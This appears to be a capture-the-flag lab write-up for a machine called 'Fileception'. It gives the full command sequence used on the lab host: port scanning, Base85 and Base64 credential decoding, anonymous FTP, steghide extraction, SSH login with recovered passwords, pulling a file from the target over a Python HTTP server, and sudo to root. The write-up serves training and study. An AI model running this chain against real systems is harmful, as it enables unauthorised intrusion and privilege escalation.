Skip to main content

Fileception

This engagement involved compromising a Linux system through a combination of service enumeration, steganography analysis, and privilege escalation. The attack path exploited misconfigured services, weak credential storage practices, and excessive sudo privileges. Key vulnerabilities included anonymous FTP access, hidden data in image files, and insecure credential storage in base64 encoding.


1. Reconnaissance

nmap -p- 172.17.0.2
PORT   STATE SERVICE
21/tcp open ftp # Anonymous access enabled
22/tcp open ssh # Potential SSH entry point
80/tcp open http # Web server for initial foothold

2. Web Server Analysis

2.1 Source Code Inspection

The web page source contained a critical comment via view-source:http://172.17.0.2/:

<!-- Base85 encoded secret: @UX=h?T9oMA7]7hA7]:YE+*g/GAhM4 -->

3. Cryptography Analysis

3.1 Base85 Identification

The encoded string exhibited characteristics of Ascii85 encoding:

CharacteristicBase85Base64
Symbol Usage@, ], +, etc.+, /, =
Length Compatibility30 (divisible by 5)Requires padding
CommonalityLess prevalentWidely used

Eliminated Alternatives:

  • Base32: No symbols, limited charset
  • Base16: Hexadecimal characters only

3.2 Decoding Process

Python script using the a85decode method:

decode_base85.py
from base64 import a85decode

encoded = "@UX=h?T9oMA7]7hA7]:YE+*g/GAhM4"
decoded = a85decode(encoded, adobe=False).decode('utf-8')
# adobe=False: Disable Adobe-specific delimiters
print(decoded) # Output: base_85_decoded_password

4. FTP Exploitation

4.1 Anonymous Access

Using the decoded password for FTP authentication:

ftp anonymous@172.17.0.2  # Password: base_85_decoded_password
ftp> get hello_peter.jpg # Retrieve steganography carrier

5. Steganography Analysis

5.1 Data Extraction with Steghide

Extracted hidden data using the previously decoded password:

steghide extract -sf hello_peter.jpg
# Passphrase: base_85_decoded_password
# Output: you_find_me.txt

Extracted Data:

Ook!-encoded message (Decoded to: 9h889h23hhss2)

Tooling Note:
Ook! language is an esoteric programming language often used in steganography challenges. Decoded via dcode.fr's Ook! translator.


6. SSH Access & Lateral Movement

6.1 Credential Reuse

Obtained SSH access using the steganography-derived password:

ssh peter@172.17.0.2  # Password: 9h889h23hhss2

7. Privilege Escalation

7.1 File Discovery in /tmp

Found critical files via directory inspection:

ls -al /tmp
  • importante_octopus.odt: ODT document (ZIP archive)
  • recuerdos_del_sysadmin.txt: Red herring text file

7.2 File Type Exploitation

  1. Hosted file via Python HTTP server:
    cd /tmp
    python3 -m http.server 6666
  2. Retrieved and analyzed document structure:
    wget http://$TARGET_IP:6666/importante_octopus.odt
    file importante_octopus.odt # Identified as ZIP archive
    unzip importante_octopus.zip -d extracted/
  3. Located credentials in leerme.xml:
    usuario: octopus
    password: ODBoMjM4MGgzNHVvdW8zaDQ= # Base64 encoded

7.3 Credential Decoding

echo "ODBoMjM4MGgzNHVvdW8zaDQ=" | base64 -d
# Output: 80h2380h34uouo3h4

7.4 Sudo Misconfiguration

sudo -l  # Revealed unrestricted sudo access
sudo su # Gained root privileges

8. Vulnerability Chain Summary

StepVulnerability ClassImpact
1Anonymous FTP AccessInitial Foothold
2Steganography PracticesCredential Exposure
3Base64 Password StorageLateral Movement
4Excessive Sudo PrivilegesPrivilege Escalation